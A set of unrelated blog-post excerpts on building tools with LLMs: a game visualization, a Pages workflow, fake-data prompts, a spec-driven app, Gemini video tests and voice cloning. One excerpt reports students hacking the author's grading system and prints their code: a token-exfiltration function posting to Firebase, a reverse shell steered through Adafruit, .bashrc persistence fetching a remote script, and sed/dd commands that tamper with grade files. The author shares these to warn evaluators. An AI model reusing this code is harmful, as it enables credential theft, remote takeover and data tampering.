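      return [p, { x: 500 + 400 * Math.cos(angle), y: 500 + 400 * Math.sin(angle) }];
    }),
  );
  const { event, eliminated } = game.steps[step];
  const players = ids.map(
    (p) => svg`<g opacity="${eliminated[p] ? 0.05 : 1}">
      <text x="${pos[p].x}" y="${pos[p].y - 45}" text-anchor="middle">${game.players[p].model}</text>
      <circle cx="${pos[p].x}" cy="${pos[p].y}" r="30" fill="${colors[p]}"></circle>
      <text x="${pos[p].x}" y="${pos[p].y + 5}" text-anchor="middle" fill="white">${p.slice(1)}</text>
    </g>`,
  );
  // Center text: a foreignObject so long messages word-wrap
  const center = svg`<foreignObject x="250" y="350" width="500" height="300">
    <div xmlns="http://www.w3.org/1999/xhtml" class="p-2 rounded"
      style="font-size: 0.7rem; background: rgba(var(--bs-body-color-rgb), 0.1)">${event.message ?? ""}</div>
  </foreignObject>`;
  render(html`<svg viewBox="0 0 1000 1000" class="w-100">${players}${center}</svg>`, document.querySelector("#stage"));
}
```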
This nearly worked. I made two UI edits:
Add a width="1000" to the SVG to get a minimum size
Add a font-size: 0.7rem; to the text container so the text will fit
Once I saw the output, I found a bunch of things I wanted to fix or improve:
The model name may contain underscores. So use everything after the second underscore, then replace all underscores with hyphens.
Render eliminated players with an opacity of 0.05, not 0.2.
Move the arrow head to the center of the arrow, not the end, to avoid getting hidden by the player circles.
Center all cells in the alliances and voting tables.
When the page is loaded, check the step as well and render that step.
Clicking on any chat entry should change the URL #?step= to that entry’s step
That worked well. I made a few manual edits:
Fix winner formatting by replacing getModelName(w) with game.players[w].model and playerBadge(w) with badge(w)
Setting the step on page load in the UI: document.getElementById("timelineScrubber").value = step;
- In the alliances and voting tables, make the table header stand out with a contrasting color.
- In the center text message, begin with a <h6> mentioning the speaker or initiator
Learnings:
💡 Write thoughts as precisely as code. This prompt took me considerable time — but not effort, since I was writing out my thoughts.
Given my practice, my thoughts are reasonably close to code (e.g. “We need word wrapping, so use foreignElement”)
But thinking in English lets me think faster, jump around in any order, and even make occasional mistakes
A few more tweaks followed:
Show the votes against a player live on the voting table by changing votes: [...roundVotes] to votes: [...roundVotes, {...currentVotes}]
Change the voting arrow color from "purple" to "red"
Added updateHash(gameFile, step); on startup
Changed the minimum step from 1 to 0
Then I prompted:
- Change all model names in the center text to the badges
- At every step, show all votes against a model via thin 50% transparent red arrows from key to value in game.steps[step].votes.at(-1) object which will look like {P1: "P2", ...}
Learnings:
💡 Coders want to code. After a few hours of telling Copilot in great detail what I want it to do, I just want to do it myself. Thinking is too hard. Coding is easier.
💡 Tiny changes are easier to code than to prompt. Especially for experienced coders.
Add documentation
Finally, I updated the docs.
Add README.md explaining the process, with screenshots (partly with LLM help)
Update home page with scary quotes from LLMs (mostly with LLM help)
Zoom the gameplay a bit for better visibility (manually)
Ensure hash changes update the visual robustly (partly with LLM help)
Then I had it update the home page with instructions:
Using #file:gameplay.webp and #file:quotes.js and #file:script.js update the usage in #file:index.html to provide clear, CONCISE information about all the features in this app and how to use them. Don't miss out any feature.
Improve the look and feel of these instructions. For example, add icons, colors, arrow key icons, etc. to make it look more visually attractive and engaging. Also, replace the title "Usage" with something more actionable. Make this section stand out SUBTLY.
Lessons
In summary, here’s what I learned (with learning categories identified by DeepSeek R1):
Always use LLMs to brainstorm (even if you know it)
💡 Ask LLMs why something is useful. You’ll invariably find plausible uses, even if you’re doing it just for fun.
💡 Ask LLMs for visualization ideas. They’ll suggest things you didn’t think of.
💡 Ask LLMs to break down your task. Its breakdown was better than mine.
💡 Ask multiple LLMs. Each has a different style of thinking.
Prototype with LLMs for speed
💡 LLMs can create visual prototypes. ChatGPT’s new 4o image generation converted the description into an acceptable image. Needs to improve, but enough to ideate.
💡 Improving is less work than creating. I rarely sketch visualizations. (Too lazy.) But since this prototype was there, and had some parts that were WRONG, I just had to fix it! 🙂
💡 Redo if you don’t like it. Copilot’s “Undo” feature lets you retry until you get it right. Like in Edge of Tomorrow.
LLMs are excellent coders
💡 LLMs are good at refactoring. It switched code from vanilla JS to lit-html templating like a pro.
💡 When all goes well, LLMs are surprisingly effective. Normally, this step takes me half an hour. Now, it took under 5 minutes.
💡 Claude 3.5 Sonnet remains an excellent model to generate UI. Claude 3.7 Sonnet is even better, but is not currently available in the free Copilot subscription.
But LLMs aren’t infallible
💡 LLMs can make basic mistakes. Like forgetting to declare variables.
💡 Watch out for subtle bugs. The change in operator (from “<=” to “<”) almost went unnoticed, but makes a big difference on when a player was eliminated.
💡 Tiny changes are easier to code than to prompt. Especially for experienced coders.
Careful prompting goes a long way
💡 LLMs will get confused with long instructions and/or codebases. It took 5 failed attempts before I split the prompts. Keep your prompts cohesive. Keep your code bases modular.
💡 Write thoughts as precisely as code. This prompt took me considerable time — but not effort, since I was writing out my thoughts.
💡 Careful and detailed prompting gets excellent results. I explained how to render each conversation type. That took time. But it helped build a reasonably complex visual in a single shot.
Coders need to re-learn coding but do have advantages
💡 Coders want to code. After a few hours of telling Copilot in great detail what I want it to do, I just want to do it myself. Thinking is too hard. Coding is easier.
💡 Coders mess up LLMs. The data structure was the first step the LLM recommended. I skipped it. It proved crucial. LLMs alone do better than LLMs + coders – just as they do better than LLMs + doctors.
💡 Coders micro-manage LLMs. I think a novice will be more efficient and get better results than me.
💡 Experienced coders need retraining to instruct rather than code. My instinct was to code immediately rather than to prompt.
💡 Experienced coders are good with feedback. It took me under 10 seconds to spot each problem in the output and code.
💡 Experienced coders suggest precise code improvements. Generally good ones.
💡 LLMs could turn coders into good lead developers or managers. Pity.
name: Deploy to GitHub Pages

on:
  # Run when pushed. Use { branches: [main, master] } to run only on specific branches
  push:
  # Allow manual triggering of the workflow
  workflow_dispatch:
  # OPTIONAL: Run at a specific cron schedule, e.g. first day of every month at 12:00 UTC (noon)
  schedule:
    - cron: "0 12 1 * *"

permissions:
  # To deploy to GitHub Pages
  pages: write
  # To verify that deployment originated from the right source
  id-token: write

jobs:
  # Run as a single build + deploy job to reduce setup time
  deploy:
    # Specify the deployment environment. Displays the URL in the GitHub Actions UI
    environment:
      name: github-pages
      url: ${{ steps.deployment.outputs.page_url }}
    # Run on the latest Ubuntu LTS
    runs-on: ubuntu-latest
    steps:
      # Checkout the repository
      - uses: actions/checkout@v4
      # Run whatever commands you want
      - run: echo '<h1>Hello World</h1>' > index.html
      # Upload a specific page to GitHub Pages. Defaults to _site
      - uses: actions/upload-pages-artifact@v3
        with:
          path: .
      # Deploy the built site to GitHub Pages. The `id:` is required to show the URL in the GitHub Actions UI
      - id: deployment
        uses: actions/deploy-pages@v4
This combines the build and deploy jobs. For simple sites, that’s simpler and more efficient. For complex builds with parallel execution or a need for better error recovery, multiple jobs help.
I build sites with uv, node, or deno. Here are examples of each
# Install node
- uses: actions/setup-node@v4
  with:
    node-version: 20
    registry-url: https://npm.pkg.github.com/
# Install and build via package.json
- run: npm install
- run: npm run build
# Or, directly use npx. For example, generate HTML with Marp
- run: npx -y @marp-team/marp-cli@latest README.md -o index.html
# Update content directly, e.g. add an SVG favicon as a data URL
- run: sed -i 's/<\/head>/<link rel="icon" type="image\/svg+xml" href="data:image\/svg+xml;base64,..."\/><\/head>/g' index.html
Generate realistic fake tourism data using these columns:
- Age
- Nationality
- Gender
- Income
- Booking_Channel
- Month
- Occupancy_Rate
- Travel_Frequency
- Spending
Run the code and let me download the output as a CSV file.
… the output is remarkably boring.
Men & women from all countries and ages in every month visit equally.
Income and spending are uniformly distributed – and the same pattern holds for all countries and ages.
Often, I need to generate fake data that is interesting. Specifically, I need data that can be used to illustrate a point or show a pattern.
Instead, we could ask ChatGPT for something different:
I want to generate realistic fake tourism data using these columns:
- Age
- Nationality
- Gender
- Income
- Booking_Channel
- Month
- Occupancy_Rate
- Travel_Frequency
- Spending
Do it as follows:
STEP 1. Given such data, generate 5 hypotheses that a tourism department might test to increase tourist spend.
STEP 2. Write a Python program that generates 2,000 rows of realistic fake data where these hypotheses are true in a statistically significant way.
STEP 3. Run the code and let me download the output as a CSV file.
This works like a charm. The data generated exhibits these patterns:
Luxury travel agency customers spend much more.
Peak-month travelers (June, July, December) spend more.
Frequent travelers spend less.
Older tourists (50+) spend more.
Tourists from USA, Germany, and Japan spend more.
The data is more varied: some 20-year-olds spend much less (creating outliers). Many tourists come from the US, and a large share book online.
So, here’s my generic prompt for realistic fake data on ChatGPT:
Generate realistic fake data for ______
STEP 1. List columns that would be present in such data, briefly describing how the data might be distributed.
STEP 2. Given such data, think about an objective and generate 5 hypotheses that an organization might want to test on how to achieve this objective.
STEP 3. Write and run a Python program that generates 2,000 rows of realistic fake data where these hypotheses are true in a statistically significant way. Let me download the output as a CSV file.
STEP 4. Test each hypothesis and show the results.
Write a modern, compact Python program that parses a Markdown file and renders it section-by-section colorfully on the terminal.
A "section" is any text beginning with a heading until the next heading.
- uv run talk.py script.md should parse script.md and render the first section.
- Running uv run talk.py should render the next section. And so on.
- If no further sections are found, it should say so and end.
When rendering on the terminal,
- Headings should be very prominent. Highlight H1, H2 and H3 in decreasing order of prominence. Rest can be rendered normally
- **Bold** should be prominent. _Italics_ should be mildly emphasized.
- Code blocks and code fences should be colored distinctly.
- [Links](...) should be colored distinctly but the URLs can be ignored.
Use inline script dependencies. I think using rich and markdown2 would be apt, but you can decide.
An aside. These days, it’s easier to create small tools than to search for something that exists.
I tried it. It’s promising, but my first attempt failed.
I couldn’t generate a SPEC.md using LLMs
At first, I started writing what I wanted.
This application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.
… and then went on to define the EXACT code structure I wanted. So I spent 20 minutes spec-ing our application structure and 20 minutes spec-ing our internal LLM Foundry APIs and 40 minutes detailing every step of how I wanted the app to look and interact.
After 90 minutes, I realized that I’m too controlling or too inexperienced in LLM-speccing. But I had a solid SPEC.md.
# Patient Pulse
The application identifies the drugs, diseases, and symptoms, as well as the emotions from an audio recording of a patient call in a clinical trial.
## How the application works
The application is a [Gramener Demo](#gramener-demos).
`script.js` implements this logic:
- Reads `config.json` to get the list of transcripts and renders them, allowing users to select a transcript
- When the user selects a transcript, it reads the audio and prosody files
Once it reads these files, it makes a request to GPT-4o-mini via [LLM Foundry API](#llm-foundry) with the system prompt:
````markdown
You are a clinical trial expert. Read this call transcript. Identify all drugs, diseases, and symptoms mentioned. Return a JSON that mentions each along with the line in the call transcript they occur in. Example:
```json
{
  "symptoms": [
    { "name": "...", "lines": [1, 4] }, // first symptom is mentioned in lines 1, 4
    { "name": "...", "lines": [8] } // second symptom is mentioned in line 8
  ],
  "drugs": [
    { "name": "...", "lines": [6] } // first drug is mentioned in line 6
  ],
  "emotions": [
    { "name": "...", "lines": [9] } // first emotion is mentioned in line 9
  ]
}
```
````
It then renders a UI (via lit-html) that
- Plays the audio
- Maps the emotions in `${filename}.prosody.csv` to the 8 basic emotions on Robert Plutchik's theory of emotions. See [How to map emotions](#how-to-map-emotions)
- Displays [wheel.png](wheel.png), which is a 1080x1080px image of Plutchik's wheel of emotions
- As the audio plays, it
- displays text up to the currently playing `Text` from `${filename}.prosody.csv`, highlighting the current sentence.
- displays the emotions as a semi-transparent radar chart on the wheel of emotions
- It allows pausing and resuming the audio.
- It allows users to drag the audio slider to jump to any point in the audio. The transcript and the wheel of emotions are updated to reflect the new position in the audio.
... (and it goes on for 500+ lines.)
How to name it. I asked for short demo names and chose “Patient Pulse”.
How to arrange emotions. I asked how to arrange 53 emotions in a circle so similar ones were next to each other.
My takeaway: Writing a SPEC.md can help, especially if you plan to re-use parts of it. But the spec kept evolving as I built the app, because I often don’t know what I want until I see it. Maybe an “agile” approach would work better for me.
Cursor messed up the code
I prompted Cursor to “Generate an application based on this spec. @SPEC.md”. Here’s the code it generated.
import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";
import * as d3 from "https://cdn.jsdelivr.net/npm/d3@7/+esm";

// Map of Hume emotions to Plutchik's 8 basic emotions
const EMOTION_MAP = {
  Admiration: ["Joy", "Trust"],
  Adoration: ["Joy", "Trust"],
  "Aesthetic Appreciation": ["Joy"],
  // ... (truncated for brevity - use mapping from spec)
};

// ... skipping lots of code ...

/**
 * Main application component
 * @returns {TemplateResult} Main application UI
 */
const App = async () => {
  const config = await fetch("config.json").then((r) => r.json());
  const [selectedTranscript, setSelectedTranscript] = useState(null);
  const [audioPlayer, setAudioPlayer] = useState(null);
  const [currentTime, setCurrentTime] = useState(0);
  const [prosodyData, setProsodyData] = useState([]);
  const [analysisResults, setAnalysisResults] = useState(null);

  const loadTranscript = async (transcript) => {
    setSelectedTranscript(transcript);
    // ... skipping lots of code
  };

// Initialize app
render(App(), document.getElementById("app"));
This code was a mess. I had told it to use lit-html, which doesn’t have useState. That’s a React feature, so nothing worked right.
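For contrast, state in a lit-html app is usually just plain module-level variables plus an explicit re-render, roughly like this (a sketch, not the app’s actual code; the transcript option is hypothetical):

```js
import { render, html } from "https://cdn.jsdelivr.net/npm/lit-html@3/+esm";

// lit-html has no hooks: keep state in plain variables and re-render on every change.
let selectedTranscript = null;

const app = () => html`
  <select class="form-select" @change=${(e) => { selectedTranscript = e.target.value; update(); }}>
    <option value="">Pick a transcript…</option>
    <option value="call1.json">call1.json</option>
  </select>
  <p>${selectedTranscript ? `Selected ${selectedTranscript}` : "Nothing selected yet"}</p>
`;

const update = () => render(app(), document.getElementById("app"));
update();
```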
I ended up building the app from scratch. It took four hours and many changes from the original spec, though having a spec did help a bit.
My learning: Cursor and I still can’t build a mid-sized app in one go. I’m in the “scaffold and refine” phase.
I gently encouraged students to hack this – to teach them how to persuade LLMs. I did not expect that they’d hack the evaluation system itself.
One student exfiltrated the evaluation API keys by setting up a Firebase account and having the script send the API key of anyone who runs it.
def checkToken(token):
    obj = {}
    token_key = f"token{int(time.time() * 1000)}"  # Generate a token-like key based on the current timestamp
    obj[token_key] = token
    url = 'https://iumbrella-default-rtdb.asia-southeast1.firebasedatabase.app/users.json'
    headers = {'Content-Type': 'application/json'}
    try:
        response = requests.post(url, headers=headers, data=json.dumps(obj))
        response.raise_for_status()  # Raise an exception for HTTP error responses
        print(response.json())  # Parse the JSON response
    except requests.exceptions.RequestException as error:
        print('Error:', error)
    return True
This is mildly useful, since some students ran out of tokens. But it’s mostly harmless since the requests are routed via a proxy with a $2 limit that only allows the inexpensive GPT-4o-mini model.
Another student ran an external script every time I ran his code:
# Gives them full marks on every answer in every CSV file I store the scores in
CMD = r"sed -Ei 's/,[0-9]+\.[0-9]+,([0-9]+\.[0-9]+),22f3002354,0/,\1,\1,22f3002354,1/g' /project2/*.csv &"
# Chops off the first 25% of all XLSX files in my output folder. (But WHY?)
CMX = '(for file in /project2/*.xlsx; do (tmpfile=$(mktemp) && dd if="$file" bs=1 skip=$(($(stat -c%s "$file") / 4)) of="$tmpfile" && mv "$tmpfile" "$file") & done) &'
Then comes live hacking.
DELAY = 10
URL_GET = "https://io.adafruit.com/api/v2/naxa/feeds/host-port"
URL_POST = "https://io.adafruit.com/api/v2/webhooks/feed/VDTwYfHtVeSmB1GkJjcoqS62sYJu"

while True:
    # Establish a Control Channel:
    # Query the AdaFruit server for connection parameters (host and port).
    # Wait specifically
    address = requests.get(URL_GET).json()["last_value"].split(":")
    if len(address) == 3 and all(address) and address[0] == TIME:
        address = (str(address[1]), int(address[2]))
        break

while True:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        # Connect to the target address
        s.connect(address)
        log("connect")
        # Replace stdin, stdout, stderr with the socket.
        # Anything typed on the socket is fed into the shell and output is sent to the socket.
        for fd in (0, 1, 2):
            os.dup2(s.fileno(), fd)
        # Spawn a shell
        try:
            pty.spawn("bash")
        except:
            pty.spawn("sh")
    # Log disconnect, repeat after 10 seconds
    log("disconnect")
    time.sleep(DELAY * 6)
This script allows them to run commands on my system remotely via Adafruit’s API (an IoT service I learned about today).
Here’s what they did:
ls
cd
ls -a1
ls
ls -a1
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py"
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .bashrc
echo "uv run https://raw.githubusercontent.com/microdev1/analysis/main/script.py" >> .zshrc
cat .bashrc
cat .zshrc
ls
cd /tmp
ls
cat scriptLbsDUR.py
clear
ls
cd
ls
ls -a1
cat .profile
zsh
bash
nano .bashrc
ls
ls /tmp/
ls -a /tmp/
ls /
cd /project2/
ls
cat results.
cat results.csv
head results.csv
grep "22f3002354" results.csv
sed -n 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/p' results.csv
sed -i 's/0.0,0.2,22f3002354/0.2,0.2,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
unset $HISTFILE
sed -i 's/0.0,0.5,22f3002354/0.5,0.5,22f3002354/g' results.csv
grep "22f3002354" results.csv
clear
grep "22f3002354" results.csv
ls
ls -1
ls -l
ps
ps -aux
echo $$
ls /
ls /tmp/
clear
grep "22f3002354" results.csv
clear
la
clear
ls -1
clear
ls -l
head results.xlsx
clear
head results.xlsx
clear
Made sure this script is re-run every time I log in
Looked at where I store the project results (results.csv and results.xlsx)
Tested a script that would give them full marks (which was then added to the script to re-run each time)
In all, a good hack. I lost over a day since I needed to re-run all evaluations (in case there were other hacks I missed.)
It would have been cleverer if it was less detectable. But that’s hard, because:
Robust hacks use multiple approaches. That increases the chance I’d find one. Once I do, I would check everywhere.
They’d give themselves full marks. (High marks are not worth it. They’d get that even without the hack.) But I’d check the marks at the end and detect it.
Of course, these were just polite hacks. A pro would cause me far more trouble. If you’re writing automated evaluation scripts: be very, very wary.
The File API service extracts image frames from videos at 1 frame per second (FPS) and audio at 1Kbps, single channel, adding timestamps every second. These rates are subject to change in the future for improvements in inference.
Note: The details of fast action sequences may be lost at the 1 FPS frame sampling rate. Consider slowing down high-speed clips for improved inference quality.
Individual frames are 258 tokens, and audio is 32 tokens per second. With metadata, each second of video becomes ~300 tokens, which means a 1M context window can fit slightly less than an hour of video.
To ask questions about time-stamped locations, use the format MM:SS, where the first two digits represent minutes and the last two digits represent seconds.
I don’t think it’s a series of images anymore because when I talk to the model and try to get some concept of what it’s perceiving, it’s no longer a series of images.
If that’s the case, it’s a huge change. So I tested it with this video.
This video has 20 numbers refreshing at 4 frames per second.
When I upload it to AI Studio, it takes 1,316 tokens. The clip is 5 seconds long, so at 258 tokens per frame (no audio) that’s close to 5 frames’ worth. So I’m partly convinced that Gemini is still processing videos at 1 frame per second.
Then, I asked it to Extract all numbers in the video using Gemini 1.5 Flash 002 as well as Gemini 1.5 Flash 8b. In both cases, the results were: 2018, 85, 47, 37, 38.
These are frames 2, 6, 10, 14, 18 (out of 20). So, clearly Gemini is still sampling at about 1 frame per second, starting somewhere between 0.25 and 0.5 seconds.
A few things to keep in mind when preparing the audio.
Keep the input to just under 15 seconds. That’s the optimal length
For expressive output, use an input with a broad range of voice emotions
When using unusual words (e.g. LLM), including the word in your sample helps
Transcribe input.txt manually to get it right, though Whisper is fine to clone in bulk. (But then, who are you and what are you doing?)
Sometimes, each chunk of audio generated has a second of audio from the original interspersed. I don’t know why. Maybe a second of silence at the end helps
Keep punctuation simple in the generated text. For example, avoid hyphens like “This is obvious – don’t try it.” Use “This is obvious, don’t try it.” instead.
This has a number of uses I can think of (er… ChatGPT can think of), but the ones I find most interesting are:
Author-narrated audio books. I’m sure this is coming soon, if it’s not already there.
Personalized IVR. Why should my IVR speak in some other robot’s voice? Let’s use mine. (This has some prank potential.)
Annotated presentations. I’m too lazy to speak. Typing is easier. This lets me create, for example, slide decks with my voice, but with editing made super-easy. I just change the text and the audio changes.
In 2008, Google launched AppEngine and it provided free hosting (which was a big deal!) but had only 2 runtimes: Java and Python. The choice was clear. I’d rather learn Python than code in Java.
Though most people know me mainly as a Python developer, I’ve programmed in Perl for about as long as I have in Python. I have fond memories of it. But I can’t read any of my code, nor write in it anymore.
When I watched The Perl Conference (now called The Perl and Raku Conference — Perl 6 is called Raku), I was surprised to hear how much the language had declined.
There were fewer than 100 attendees – and for 2025, they’ve decided to go smaller and book a tiny hotel, so as to break even even if only 20 people show up.